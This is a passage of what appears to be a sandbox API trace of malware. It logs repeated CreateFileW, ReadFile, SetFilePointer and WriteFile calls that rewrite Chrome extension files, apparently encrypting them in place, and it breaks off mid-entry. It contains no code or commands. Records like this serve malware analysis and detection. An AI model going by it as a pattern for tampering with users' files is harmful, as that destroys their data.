WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.550] ReleaseMutex (hMutex=0x168) returned 1 [0177.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.550] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0177.551] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.551] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0177.551] CloseHandle (hObject=0x1cc) returned 1 [0177.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.552] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.552] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb3 [0177.552] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.552] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.552] ReleaseMutex (hMutex=0x168) returned 1 [0177.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.552] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0177.553] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.553] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0177.553] CloseHandle (hObject=0x1cc) returned 1 [0177.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.554] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.554] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb3 [0177.554] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.554] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.555] ReleaseMutex (hMutex=0x168) returned 1 [0177.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.555] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0177.556] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.556] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0177.556] CloseHandle (hObject=0x1cc) returned 1 [0177.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.557] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.557] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb3 [0177.557] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.557] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.557] ReleaseMutex (hMutex=0x168) returned 1 [0177.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.557] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f39618, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39618*, lpNumberOfBytesRead=0x2e9f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0177.558] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.558] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0177.558] CloseHandle (hObject=0x1cc) returned 1 [0177.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.559] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.559] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x12f [0177.559] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.559] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.559] ReleaseMutex (hMutex=0x168) returned 1 [0177.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.559] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f19728, nNumberOfBytesToRead=0x12f, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f19728*, lpNumberOfBytesRead=0x2e9f2bc*=0x12f, lpOverlapped=0x0) returned 1 [0177.560] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.560] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6b7, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6b7, lpOverlapped=0x0) returned 1 [0177.560] CloseHandle (hObject=0x1cc) returned 1 [0177.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.561] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.561] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe5 [0177.561] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.561] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.562] ReleaseMutex (hMutex=0x168) returned 1 [0177.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.562] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe5, lpOverlapped=0x0) returned 1 [0177.563] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.563] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x66d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x66d, lpOverlapped=0x0) returned 1 [0177.563] CloseHandle (hObject=0x1cc) returned 1 [0177.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.564] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.564] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xeb [0177.564] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.564] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.564] ReleaseMutex (hMutex=0x168) returned 1 [0177.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.564] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2e9f2bc*=0xeb, lpOverlapped=0x0) returned 1 [0177.565] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.565] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x673, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x673, lpOverlapped=0x0) returned 1 [0177.565] CloseHandle (hObject=0x1cc) returned 1 [0177.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xdd [0177.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.567] ReleaseMutex (hMutex=0x168) returned 1 [0177.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.567] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0177.568] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.568] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x665, lpOverlapped=0x0) returned 1 [0177.568] CloseHandle (hObject=0x1cc) returned 1 [0177.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.569] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.569] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xde [0177.569] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.569] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.569] ReleaseMutex (hMutex=0x168) returned 1 [0177.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.569] ReadFile (in: hFile=0x1cc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2e9f2bc*=0xde, lpOverlapped=0x0) returned 1 [0177.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.570] WriteFile (in: hFile=0x1cc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2e9f2d0*=0x666, lpOverlapped=0x0) returned 1 [0177.571] CloseHandle (hObject=0x1cc) returned 1 [0177.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.572] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.572] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd4 [0177.572] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.572] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.572] ReleaseMutex (hMutex=0x168) returned 1 [0177.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0177.606] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ed1678, nNumberOfBytesToRead=0xd4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1678*, lpNumberOfBytesRead=0x2e9f2bc*=0xd4, lpOverlapped=0x0) returned 1 [0177.607] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0177.607] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x65c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x65c, lpOverlapped=0x0) returned 1 [0177.607] CloseHandle (hObject=0x1cc) returned 1 [0177.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0177.608] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0177.608] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, 